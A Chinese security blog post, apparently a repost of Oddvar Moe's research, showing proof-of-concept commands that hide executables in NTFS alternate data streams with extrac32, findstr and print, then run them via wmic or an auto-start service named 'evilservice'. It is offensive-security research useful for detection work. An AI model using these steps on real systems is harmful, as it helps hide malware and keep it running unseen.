最新消息:

ADS数据流 第二篇

Windows demon 91浏览 0评论

EXTRAC32.EXE

首先是extrac32。如果不知道这个命令,你可以在这里阅读更多关于它的信息:https://ss64.com/nt/extract.html

基本上你用它来提取cab文件。我想到的是,你也可以使用这个命令添加备用数据流。这样做的PoC(包括创建CAB)如下所示:

echo "empty file" > c:\ADS\file.txt
makecab c:\ADS\procexp.exe c:\ADS\procexp.cab
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
wmic process call create '"c:\ADS\file.txt:procexp.exe"'

Findstr.exe

同样在我的研究中,我发现Findstr也可以用来将有效载荷作为ADS流注入到另一个文件中。Findstr.exe基本上是一个用于在文件中查找字符串的命令。
更多关于这里的二进制文件:https:  //ss64.com/nt/findstr.html

我发现很酷的事情是,你可以搜索一个不存在于文件中的字符串,并将其转换为新文件。而且很酷的是,它确实允许将它传送到文件的ADS流中。它看起来像这样:

echo "empty file" > c:\ADS\file.txt
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
wmic process call create '"c:\ADS\file.txt:procexp.exe"'

findstr命令中的/ V确保显示与我正在搜索的字符串不匹配的所有内容

执行ADS二进制

我发现另一种方式来执行备用数据流中的二进制文件。可以在Windows中创建一个服务(这需要本地管理员权限),该服务执行备用数据流中的内容。我使用SC命令执行必要的命令以使用以下命令创建服务:

echo "empty file" > c:\ADS\file.txt
type c:\windows\system32\cmd.exe > c:\ADS\file.txt:cmd.exe
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
print /d:c:\Users\demon\1.txt:procexp.exe c:\Users\demon\procexp.exe
wmic process call create '"C:\Users\demon\1.txt:procexp.exe"'

参考:

https://www.youtube.com/watch?v=nPBcSP8M7KE&feature=youtu.be

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

转载请注明:即刻安全 » ADS数据流 第二篇

您必须 登录 才能发表评论!



合作伙伴